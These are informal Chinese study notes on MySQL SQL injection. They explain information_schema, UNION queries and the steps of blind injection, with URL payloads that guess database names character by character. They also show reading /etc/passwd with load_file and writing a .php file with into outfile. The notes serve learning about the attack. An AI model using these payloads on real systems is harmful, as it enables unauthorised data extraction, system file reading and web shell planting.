提示:
table_schema = 库名称
table_name = 表名称
column_name = 字段名称
information.schcema库 下面有两个表
1,tables = 存放的是 所有的 库名 + 表名(通过where 库名来获取 所有的表)
2,columns = 存放的是 所有的列名 (通过where 表名来获取 所有的字段)
一、sssss
1.union
select * from user where id = 1 union select * from user where id = 2;
字段显示 是 以第一个查询为准
2.title
1111111111111
1.盲注的流程-
1.判断是否存在注入点
2.猜解当前数据库名称,注:需要先猜解数据库名称的长度+3.猜解数据库中的表名,注:需要先猜解数据表名称的长度
4.猜解表中的字段名,注:需要先猜解字段的数量,再猜解字段名称的长度e
5.猜解数据,注:需要先猜解数据的记录数,再对每条记录的长度和数据进行猜解
查询数据库长度 length(‘123’) // 3
?id=1' and length(database()) = 8 --+
查询数据库名称 substr(123,1,1) // 1
?id=1' and substr(database(),1,1) = 's' --+
通过 ascii 把字符 转成 ascii 数字 查询 ascii(‘s’) = 115 // true
?id=1' and ascii(substr(database(),1,1)) = 115 --+
查一条语句的长度 length( ( select * from user limit 0,1) )
select length(( select table_name from information_schema.tables where table_schema = database() limit 0,1) )= 6;
查一条语句的z字段 substr( ( select * from user limit 0,1) )
select substr(( select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1) = 'e';
mysql 读取文件
select * from users where id = -1 union select 1,2,load_file('/etc/passwd')\G;
google 吧\G去掉
mysql 写入文件
select '12345,aaaaa6' into outfile "/var/lib/mysql/fei.php";